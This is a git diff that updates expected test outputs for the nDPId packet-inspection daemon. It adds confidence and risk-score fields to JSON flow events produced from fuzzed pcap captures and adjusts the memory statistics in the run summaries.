-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"proto":"SMBv23","breed":"Acceptable","category":"System"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469611651,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00825{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","total-events-serialized":1640}
+00172{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","total-events-serialized":1642}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 691/554
 ~~ skipped flows.............: 0
@@ -1646,9 +1648,9 @@
 ~~ total active/idle flows...: 249/249
 ~~ total timeout flows.......: 28
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5100479 bytes
-~~ total memory freed........: 5100479 bytes
-~~ total allocations/frees...: 101182/101182
+~~ total memory allocated....: 5050664 bytes
+~~ total memory freed........: 5050664 bytes
+~~ total allocations/frees...: 102772/102772
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 177 chars
 ~~ json string max len.......: 1890 chars
diff --git a/test/results/fuzz-2006-09-29-28586.pcap.out b/test/results/fuzz-2006-09-29-28586.pcap.out
index 14aab6fe8..fa94eb7b2 100644
--- a/test/results/fuzz-2006-09-29-28586.pcap.out
+++ b/test/results/fuzz-2006-09-29-28586.pcap.out
@@ -11,7 +11,7 @@
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"}
 02409{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -22,7 +22,7 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"}
-00719{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}}
+00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -37,7 +37,7 @@
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
